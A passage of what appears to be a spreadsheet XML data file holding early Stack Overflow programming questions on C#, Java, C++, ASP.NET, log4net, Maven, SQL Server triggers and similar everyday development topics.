&lt;p&gt;For instance with a generic deterministically destructible value-type I can make the &lt;code&gt;using&lt;/code&gt; and &lt;code&gt;lock&lt;/code&gt; keywords redundant (achievable by library classes):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public struct Disposer&amp;lt;T&amp;gt; where T : IDisposable
    {
        T val;
        public Disposer(T t) { val = t; }
        public T Value { get { return val; } }
        ~Disposer()  // Currently illegal 
        {
            if (val != default(T))
                val.Dispose();
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I can't help but end with a apropos quotation which I once saw but can't currently find its origin.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;You can take my deterministic destruction when my cold dead hand goes out of scope.  --&lt;em&gt;Anon&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>What ways are there of drawing 3D trees using Java and OpenGL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know how to draw basic objects using JOGL or LWJGL to connect to OpenGL. What I would like is something that can generate some kind of geometry for trees, similar to what SpeedTree is famous for. Obviously I don't expect the same quality as SpeedTree.&lt;/p&gt;
&lt;p&gt;I want the trees to not look repetitive. Speed is not a concern, I do not expect to need more than 100 trees on screen at one time. &lt;/p&gt;
&lt;p&gt;Are there free tree-drawing libraries available in Java? Or sample code or demos?
Is there anything in other languages which I could port or learn from?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: Serializing unknown Arraysize</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I safe an Array and reload it, is there a possibility to get the size if its unknown? 
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>AutoPostback with TextBox loses focus</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A &lt;code&gt;TextBox&lt;/code&gt; is set to &lt;code&gt;AutoPostback&lt;/code&gt; as changing the value should cause a number of (display-only) fields to be recalculated and displayed.&lt;br&gt;
That works fine.&lt;/p&gt;
&lt;p&gt;However, when the field is tabbed out of, the focus briefly moves on to the next field, then disappears when the page is redrawn so there is no focus anywhere. &lt;/p&gt;
&lt;p&gt;I want the focus to be on the new field, not the textbox I've just changed.
Is there a way to work out which field had the focus and force it to have it again when the page is redrawn? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why can't c++ ifstreams read from devices?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I knew I should never have started using c++ io, the whole "type safety" argument is a red herring (does anyone &lt;em&gt;really&lt;/em&gt; find that it's one of their most pressing problems?). Anyhow, I did, and discovered a strange difference between ifstreams and FILE*s and plain old file descriptors: ifstreams cannot read from a device. Can anyone think of a reason why?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const char*	path = "/dev/disk3";
char		b;
// this works
FILE* f= fopen(path, "rb");
int i = fread(&amp;amp;b, 1, 1, f);		// returns 1, success!
// this does not work
ifstream	cf(path, ios::binary);
cf.read(&amp;amp;b, 1);
bool		good = cf.good();	// returns false, failure.
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Multiple instances of a java web application sharing a resource</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web service, that takes an input xml message, transforms it, and then forwards it to another web service.&lt;/p&gt;
&lt;p&gt;The application is deployed to two web logic app servers for performance, and resilience reasons.&lt;/p&gt;
&lt;p&gt;I would like a single website monitoring page that allows two things&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;ability to stop/ start forwarding of messages&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;ability to monitor throughput of number of messages in the last hour etc. Number of different senders into the webservice etc.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I was wondering what the best way to implement this was.&lt;/p&gt;
&lt;p&gt;My current idea is to have an in memory database (eg Debry or HSQL) replicating data to share the information between the two (or more) instances of my application that are running in different instances of the app server. I imagine I would have to setup some sort of master/ slave configuration.&lt;/p&gt;
&lt;p&gt;I would love a link to an article that discusses how to solve this problem.&lt;/p&gt;
&lt;p&gt;(Note, this is a simple spring application using spring MVC)&lt;/p&gt;
&lt;p&gt;thanks,&lt;/p&gt;
&lt;p&gt;David.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Incorporating shareware restrictions in C++ software</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wish to implement my software on a shareware basis, so that the user is
given a maximum trial period of (say) 30 days with which to try out the software. On purchase I intend the user to be given a randomly-generated key, which when entered
enables the software again.&lt;/p&gt;
&lt;p&gt;I've never been down this route before, so any advice or feedback or pointers to 'standard' ways of how this is done would be much appreciated.&lt;/p&gt;
&lt;p&gt;I do not anticipate users cheating by changing the system date or anything like that, though this is probably worth considering. Apologies if this topic has appeared before.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JRE Upgrade</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there anyway to upgrade the installed JRE in the system? We are having 1.5.0_08 installed in out HP Unix system.We have to upgrade this to 1.5.0_15.Is there a way to patch up the existing JRE and upgrade to a newer version.Or can this only be achieved by installing the newer JRE and set this in the system PATH.&lt;/p&gt;
&lt;p&gt;Thanks for your time.&lt;/p&gt;
&lt;p&gt;Regards,
Vivek&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is abstracting data type (sometimes) a good idea?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There are numerous times you have an interface that accepts similar type arguments that have a separate domain logic meaning:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static class Database
{
   public static bool HasAccess(string userId, string documentId) { return true; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now it's quite easy to have someone key documentId instead of userId and vice versa. One could prevent that by abstracting the data type of the arguments:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class UserId
{
   public string Value { get; internal set; }
   public static implicit operator string(UserId id) { return id.Value; }
}
public class DocumentId
{
   public string Value { get; internal set; }
   public static implicit operator string(DocumentId id) { return id.Value; }
}
public static class Database
{
    public static bool HasAccess(UserId userId, DocumentId documentId) { return true; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This way you get a nice compiler warning if you type in arguments out of order:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;UserId e = new UserId() { Value = "a" };
DocumentId d = new DocumentId() { Value = "b" };
Database.HasAccess(d, e);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You also get the ability to change abstracted type in without affecting the rest of the system but that's not very likely. Would abstracting type be a good idea to get more type safety?&lt;/p&gt;
&lt;p&gt;The question relates to C# solutions but short descriptions in other languages is welcome.&lt;/p&gt;
&lt;p&gt;EDIT: Removed the implicit cast from string and pointing finger at the C# tag.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python - Py2exe can't build .exe using the 'email' module</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;py2exe does not work with the standard email module&lt;/p&gt;
&lt;p&gt;Hello. I am trying to use py2exe for converting a script into an exe. The build process shows this:&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;The following modules appear to be missing&lt;/p&gt;
&lt;h2&gt;['email.Encoders', 'email.Generator', 'email.Iterators', 'email.MIMEBase', 'email.MIMEMultipart', 'email.MIMEText', 'email.Utils', 'email.base64MIME']&lt;/h2&gt;
&lt;p&gt;The executable does not work. The referenced modules are not included. I researched this on the Internet and I found out that py2exe has a problem with the Lazy import used in the standard lib email module. Unfortunately I have not succeeded in finding a workaround for this problem. Can anyone help?&lt;/p&gt;
&lt;p&gt;Thank you,&lt;/p&gt;
&lt;p&gt;P.S.
Imports in the script look like this:&lt;/p&gt;
&lt;p&gt;Code: Select all
    import string,time,sys,os,smtplib
    from email.MIMEMultipart import MIMEMultipart
    from email.MIMEBase import MIMEBase
    from email.MIMEText import MIMEText
    from email import Encoders&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recursive Rails Nested Resources</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Rails application for project management where there are Project and Task models. A project can have many tasks, but a task can also have many tasks, ad infinitum.&lt;/p&gt;
&lt;p&gt;Using nested resources, we can have /projects/1/tasks, /projects/1/tasks/new, /projects/1/tasks/3/edit etc.&lt;/p&gt;
&lt;p&gt;However, how do you represent the recursive nature of tasks RESTfully? I don't want go another level deep, so perhaps the following would do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;map.resources :tasks do |t|
    t.resources :tasks
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That would give me the following urls:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/tasks/3/tasks/new   
/tasks/3/tasks/45/edit
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or perhaps when it comes to an individual task I can just use /tasks/45/edit&lt;/p&gt;
&lt;p&gt;Is this a reasonable design?&lt;/p&gt;
&lt;p&gt;Cam&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing a language for the Windows Scripting Host (WSH)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone had any experience targetting &lt;code&gt;WSH&lt;/code&gt; in the way that &lt;code&gt;VBScript&lt;/code&gt;, &lt;code&gt;JScript&lt;/code&gt;, &lt;code&gt;PerlScript&lt;/code&gt;, &lt;code&gt;xbScript&lt;/code&gt; and &lt;code&gt;ForthScript&lt;/code&gt; (among other) do, such that the language can be used from the command line and embedded in server-side web pages? Where do I go to get that kind of information? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spring webflow : Move through view states</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Within a spring webflow, i need to implement a navigation bar that will allow to "step back" or resume the flow to one of the previous view.&lt;/p&gt;
&lt;p&gt;For example :&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;View 1 = login&lt;/li&gt;
&lt;li&gt;View 2 = My informations&lt;/li&gt;
&lt;li&gt;View 3 = My messages&lt;/li&gt;
&lt;li&gt;View 4 = Close session&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For this example, i would like to return back to view 2 from the view 4 page.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using VS 2005 to design abstract forms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There's a famous bug in Visual Studio that prevents you from using the form designer on a subclass of an abstract form.  &lt;/p&gt;
&lt;p&gt;This problem has already been elucidated and solved most elegantly by &lt;a href="http://www.urbanpotato.net/default.aspx/document/2001" rel="nofollow" title="Please read this page for a description of the problem and its solution."&gt;Urban Potato&lt;/a&gt;; that's not the part I'm having trouble with.  The trouble is, I have duplicated the technique described by Urban Potato, and included it in my project (which happens to be pretty big), and now every time I try to open the designer of my derived form, I get that Microsoft "frightfully sorry, old chap, but I'm going to have to kill you now" message (reminiscent of Otto in &lt;em&gt;A Fish Called Wanda&lt;/em&gt;) that says "Microsoft Visual Studio 2005 has encountered a problem and needs to close.  We are sorry for the inconvenience."&lt;/p&gt;
&lt;p&gt;But here's the &lt;strong&gt;real&lt;/strong&gt; kicker: if you just ignore that message, and stuff it away beyond the bottom right corner of the screen, you can carry on working, perfectly normally!  Just don't click the "Send Error Report" or "Don't Send" buttons, coz then VS &lt;strong&gt;does&lt;/strong&gt; close.&lt;/p&gt;
&lt;p&gt;Still, this phenomenon is highly annoying, and I'd very much like to be able to work without the feeling that my IDE is just &lt;em&gt;looking&lt;/em&gt; for some really nasty way to get back at me for pooh-poohing its sage advice to quit now - or else.&lt;/p&gt;
&lt;p&gt;Further useful info: this same behavior can be duplicated on all other computers in my office; it's nothing specific to my machine.  Obviously something in the project/code is upsetting the IDE, but at least I know the design pattern works, coz after I ignore the crash message, the designer works perfectly well.  I just don't know where to start looking for the thing that is causing this problem.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Log4Net "Could not find schema information" messages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I decided to use &lt;a href="http://logging.apache.org/log4net/index.html"&gt;log4net&lt;/a&gt; as a logger for a new webservice project. Everything is working fine, but I get a lot of messages like the one below, for every log4net tag I am using in my &lt;code&gt;web.config&lt;/code&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Could not find schema information for
  the element 'log4net'...&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Below are the relevant parts of my &lt;code&gt;web.config&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;  &amp;lt;configSections&amp;gt;
    &amp;lt;section name="log4net" 
        type="log4net.Config.Log4NetConfigurationSectionHandler, log4net" /&amp;gt;
  &amp;lt;/configSections&amp;gt;
  &amp;lt;log4net&amp;gt;
    &amp;lt;appender name="RollingFileAppender" type="log4net.Appender.RollingFileAppender"&amp;gt;
      &amp;lt;file value="C:\log.txt" /&amp;gt;
      &amp;lt;appendToFile value="true" /&amp;gt;
      &amp;lt;rollingStyle value="Size" /&amp;gt;
      &amp;lt;maxSizeRollBackups value="10" /&amp;gt;
      &amp;lt;maximumFileSize value="100KB" /&amp;gt;
      &amp;lt;staticLogFileName value="true" /&amp;gt;
      &amp;lt;layout type="log4net.Layout.PatternLayout"&amp;gt;
        &amp;lt;conversionPattern value="%date [%thread] %-5level: %message%newline" /&amp;gt;
      &amp;lt;/layout&amp;gt;
    &amp;lt;/appender&amp;gt;
    &amp;lt;logger name="TIMServerLog"&amp;gt;
      &amp;lt;level value="DEBUG" /&amp;gt;
      &amp;lt;appender-ref ref="RollingFileAppender" /&amp;gt;
    &amp;lt;/logger&amp;gt;
  &amp;lt;/log4net&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Solved:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Copy every log4net specific tag to a separate &lt;code&gt;xml&lt;/code&gt;-file. Make sure to use &lt;code&gt;.xml&lt;/code&gt; as file extension.&lt;/li&gt;
&lt;li&gt;Add the following line to &lt;code&gt;AssemblyInfo.cs&lt;/code&gt;:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre class="lang-cs prettyprint-override"&gt;&lt;code&gt;[assembly: log4net.Config.XmlConfigurator(ConfigFile = "xmlFile.xml", Watch = true)]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/users/20774/nemo"&gt;nemo&lt;/a&gt; added:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Just a word of warning to anyone
  follow the advice of the answers in
  this thread. There is a possible
  security risk by having the log4net
  configuration in an xml off the root
  of the web service, as it will be
  accessible to anyone by default. Just
  be advised if your configuration
  contains sensitive data, you may want
  to put it else where.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;p&gt;@wcm: I tried using a separate file. I added the following line to &lt;code&gt;AssemblyInfo.cs&lt;/code&gt;&lt;/p&gt;
&lt;pre class="lang-cs prettyprint-override"&gt;&lt;code&gt;[assembly: log4net.Config.XmlConfigurator(ConfigFile = "log4net.config", Watch = true)]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and put everything dealing with log4net in that file, but I still get the same messages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sharing Test code in Maven</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can you depend on test code from another module in Maven?  &lt;/p&gt;
&lt;p&gt;Example, I have 2 modules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Base&lt;/li&gt;
&lt;li&gt;Main&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I would like a test case in Main to extend a base test class in Base.  Is this possible?&lt;/p&gt;
&lt;p&gt;Update: Found an &lt;a href="http://stackoverflow.com/questions/174560/sharing-test-code-in-maven#174670"&gt;acceptable answer&lt;/a&gt;, which involves creating a test jar.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to set property to Guid in aspx page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following code in one of my aspx pages:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;% foreach (Dependency dep in this.Common.GetDependencies(this.Request.QueryString["Name"]))
   { %&amp;gt;
        &amp;lt;ctl:DependencyEditor DependencyKey='&amp;lt;%= dep.Key %&amp;gt;' runat="server" /&amp;gt;
&amp;lt;% } %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run it, I get the following error: &lt;pre&gt;&lt;strong&gt;Parser Error Message:&lt;/strong&gt; Cannot create an object of type 'System.Guid' from its string representation '&amp;lt;%= dep.Key %&gt;' for the 'DependencyKey' property.&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;Is there any way that I can create a control and pass in a Guid in the aspx page? I'd really hate to have to loop through and create these controls in the code behind just because of that...&lt;/p&gt;
&lt;p&gt;NOTE: The Key property on the Dependency object &lt;em&gt;is&lt;/em&gt; a Guid.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to disable a SQL Server trigger for just a particular scope of execution?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In SQL Server 2005, is there a way for a trigger to find out what object is responsible for firing the trigger? I would like to use this to disable the trigger for one stored prodecure.&lt;/p&gt;
&lt;p&gt;Is there any other way to disable the trigger only for the current transaction? I could use the following code, but if I'm not mistaken, it would affect concurrent transactions as well - which would be a bad thing.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DISABLE TRIGGER { [ schema_name . ] trigger_name [ ,...n ] | ALL } ON { object_name | DATABASE | ALL SERVER } [ ; ]
ENABLE TRIGGER { [ schema_name . ] trigger_name [ ,...n ] | ALL } ON { object_name | DATABASE | ALL SERVER } [ ; ]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If possible, I would like to avoid the technique of having a "NoTrigger" field in my table and doing a &lt;code&gt;NoTrigger = null&lt;/code&gt;, because I would like to keep the table as small as possible.&lt;/p&gt;
&lt;p&gt;The reason I would like to avoid the trigger is because it contains logic that is important for manual updates to the table, but my stored procedure will take care of this logic. Because this will be a highly used procedure, I want it to be fast.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Triggers impose additional overhead on the server because they initiate an implicit transaction. As soon as a trigger is executed, a new implicit transaction is started, and any data retrieval within a transaction will hold locks on affected tables.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;From: &lt;a href="http://searchsqlserver.techtarget.com/tip/1,289483,sid87_gci1170220,00.html#trigger"&gt;http://searchsqlserver.techtarget.com/tip/1,289483,sid87_gci1170220,00.html#trigger&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to validate a credit card in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a credit card number and no additional information, what is the best way in PHP to determine whether or not it is a valid number?&lt;/p&gt;
&lt;p&gt;Right now I need something that will work with American Express, Discover, MasterCard, and Visa, but it might be helpful if it will also work with other types.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LINQ - which layer should LINQ typically fall into, DAL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;just wanted to gather different ideas and perspectives as to which layer should (and why) LINQ fall into?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I convert HTML to Textile?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm scraping a static html site and moving the content into a database-backed CMS.  I'd like to use Textile in the CMS.  &lt;/p&gt;
&lt;p&gt;Is there a tool out there that converts HTML into Textile, so I can scrape the existing site, convert the HTML to Textile, and insert that data into the database?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ratio of time spent on coding versus unit testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is a typical estimate for coding unit tests given an estimate for coding new functionality? Is this different for estimates to maintain code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to output CDATA using ElementTree</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've discovered that cElementTree is about 30 times faster than &lt;code&gt;xml.dom.minidom&lt;/code&gt; and I'm rewriting my XML encoding/decoding code. However, I need to output XML that contains CDATA sections and there doesn't seem to be a way to do that with ElementTree.&lt;/p&gt;
&lt;p&gt;Can it be done?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ thread/process identifier</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a &lt;em&gt;portable&lt;/em&gt; way of getting thread and/or process identifier (string, int, ...) with C++?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I slice an array in Excel VBA?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What function can I use in Excel VBA to slice an array?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Safe to Run LogParser Against Live Production IIS Log?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it safe to run LogParser against our live production IIS log file?&lt;/p&gt;
&lt;p&gt;Currently, I have been copying it over to another location and then running LogParser 2.2 against the log file.&lt;/p&gt;
&lt;p&gt;Instead, I would really like to run it against the live data so that I can see changes to it immediately, however, I am a little concerned that it might cause issues.&lt;/p&gt;
&lt;p&gt;Does anyone know if querying the live IIS logs would cause a problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I convert a file's format from Unicode to ASCII using Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use a 3rd party tool that outputs a file in Unicode format.  However, I prefer it to be in ASCII. The tool does not have settings to change the file format.&lt;/p&gt;
&lt;p&gt;What is the best way to convert the entire file format using Python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>I want to use an LDAP client here at work to talk to Active Directory. How can I discover on my own the IP I should be aiming at?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know I could just ask, but that would involve bureaucratic entanglements.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Watch for addition of a referenced library to a project (Visual Studio 2008 plug-in)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am hoping someone can help me with this. What I have been looking around for but can't seem to find is if there is someway to add an event, or anything else that will allow a visual studio plug-in to watch for an external reference to be added to a currently open solution / project? &lt;/p&gt;
&lt;p&gt;Or even better yet would anyone happen to know of an add-in that automatically adds all controls from a referenced dll into the visual studio toolbox?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unmanaged Threads Spring Quartz Websphere Hibernate</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It appears that our implementation of using Quartz - JDBCJobStore along with Spring, Hibernate and Websphere is throwing unmanaged threads.  &lt;/p&gt;
&lt;p&gt;I have done some reading and found a tech article from IBM stating that the usage of Quartz with Spring will cause that.  They make the suggestion of using CommnonJ to address this issue.&lt;/p&gt;
&lt;p&gt;I have done some further research and the only examples I have seen so far all deal with the plan old JobStore that is not in a database.&lt;/p&gt;
&lt;p&gt;So, I was wondering if anyone has an example of the solution for this issue.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How is your Development Environment Set up?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Curious to know how people set up their personal and/or work development environment, in terms of:&lt;/p&gt;
&lt;p&gt;Do you just have all of your developer tools (for example Visual Studio, SSMS, etc.) installed on your main operating system;&lt;br&gt;
Do you use Virtual Machines to have a separate "clean" dev environment that consists only of the OS and one compiler you're working with;&lt;br&gt;
Do you have multiple OS's in a multi-boot system;&lt;br&gt;
Do you remote connect to a separate machine with your developer tools installed on there&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Swing: Is there a way to differentiate between a user-caused ItemEvent and an application-caused one?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with a combobox in a Swing-based application, and I'm having a hard time figuring out what to do to differentiate between an ItemEvent that is generated from a user event vs one caused by the application. &lt;/p&gt;
&lt;p&gt;For instance, Lets say I have a combobox, '&lt;code&gt;combo&lt;/code&gt;' and I'm listening for itemStateChanged events with my ItemListener, '&lt;code&gt;listener&lt;/code&gt;'. When either a user changes the selection to item 2 or I execute the line (pseudocode):&lt;/p&gt;
&lt;p&gt;&lt;code&gt;combo.setSelection(2)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;.. it seems like I'm not able to tell these events apart. &lt;/p&gt;
&lt;p&gt;That said, I'm no Swing expert by any means, so I thought I would ask. &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flex : Filter a datagrid using a combobox value that is contained in a datafield</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a filter in a combobox with a number of entries. Instead of filtering the datagrid with an exact match, I would like to take the selected value and only display records where the selected value is contained in the datafield.
For example: the user selects a value of "New" and the datagrid displays records where the contents of the record could be "New User", "New Person", "This one is New" etc.
I think that I need to use RegExp, but I cant work out how to get it to work.
Thanks in advance,
S... &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to create user help documentation for an Excel VBA solution?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;VBA solutions can vary widely in size.  &lt;/p&gt;
&lt;p&gt;I would like to add &lt;strong&gt;user help&lt;/strong&gt; documentation to all solutions but the level of effort to create and deploy the &lt;strong&gt;help&lt;/strong&gt; needs to match the size of the solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Irregular shaped Windows Form (C#)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the easiest way to do this? Is it possible with managed code?&lt;/p&gt;
&lt;p&gt;Thanks for your time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a good Web Crawler tool</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to index a whole lot of webpages, what good webcrawler utilities are there?  I'm preferably after something that .NET can talk to, but that's not a showstopper.&lt;/p&gt;
&lt;p&gt;What I really need is something that I can give a site url to &amp;amp; it will follow every link and store the content for indexing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Nano hacks: most useful tiny programs you've coded or come across</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's the first &lt;a href="http://oreilly.com/catalog/opensources/book/larry.html" rel="nofollow"&gt;great virtue&lt;/a&gt; of programmers. All of us have, at one time or another automated a task with a bit of throw-away code. Sometimes it takes a couple seconds tapping out a one-liner, sometimes we spend an exorbitant amount of time automating away a two-second task and then never use it again.&lt;/p&gt;
&lt;p&gt;What tiny hack have you found useful enough to &lt;b&gt;reuse&lt;/b&gt;? To make go so far as to make an alias for?&lt;/p&gt;
&lt;p&gt;Note: before answering, please check to make sure it's not already on &lt;a href="http://stackoverflow.com/questions/68372/what-is-your-single-most-favorite-command-line-trick-using-bash"&gt;favourite command-line tricks using BASH&lt;/a&gt; or perl/ruby one-liner questions. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>NUnit assembly not found</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used NUnit before, but not in a while, and never on this machine.  I unzipped version 2.4.8 under Program Files, and I keep getting this error when trying to load my tests.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Could not load file or assembly 'nunit.framework, Version=2.4.8.0, Culture=neutral, PublicKeyToken=96d09a1eb7f44a77' or one of its dependencies. The system cannot find the file specified**&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;In order to simplify the problem, I've compiled the most basic possible test file.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using NUnit.Framework;
namespace test
{
    [TestFixture]
    public class Tester
    {
        [Test]
        public void ATest()
        {
            Assert.IsTrue( false, "At least the test ran!" );
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've added "C:\Program Files\NUnit-2.4.8-net-2.0\bin" to my PATH (and rebooted).  Note that if I copy the test assembly into that folder, then&lt;/p&gt;
&lt;pre&gt;
C:\Program Files\NUnit-2.4.8-net-2.0\bin&gt;nunit-console test.dll
&lt;/pre&gt;
&lt;p&gt;works, but&lt;/p&gt;
&lt;pre&gt;
C:\Program Files\NUnit-2.4.8-net-2.0\bin&gt;nunit-console c:\dev\nunit_test\test.dll
&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;
C:\dev\nunit_test&gt;nunit_console test.dll
&lt;/pre&gt;
&lt;p&gt;fail with the above error.&lt;/p&gt;
&lt;p&gt;Presumably I could get around this by copying the NUnit.Framework dll into my project's bin folder, but I don't remember having to do this in the past.  Moreover, I get the same error in the GUI.  Shouldn't the GUI know where the framework is located (that is, in the same folder)?&lt;/p&gt;
&lt;p&gt;@Scott, I'm not using Visual Studio.  I use the following line to compile the test project.&lt;/p&gt;
&lt;pre&gt;
%windir%\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:"C:\Program Files\NUnit-2.4.8-net-2.0\bin\nunit.framework.dll" /t:library /out:test.dll test.cs
&lt;/pre&gt;
&lt;p&gt;@devio, I tried both the msi and the zip with the same result.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>java 1.5 to 1.4</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to convert existing jar (without source) written in java 1.5 into java 1.4.x?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it worthwhile to use a bit vector/array rather than a simple array of bools?</t>
  </si>
  <si>
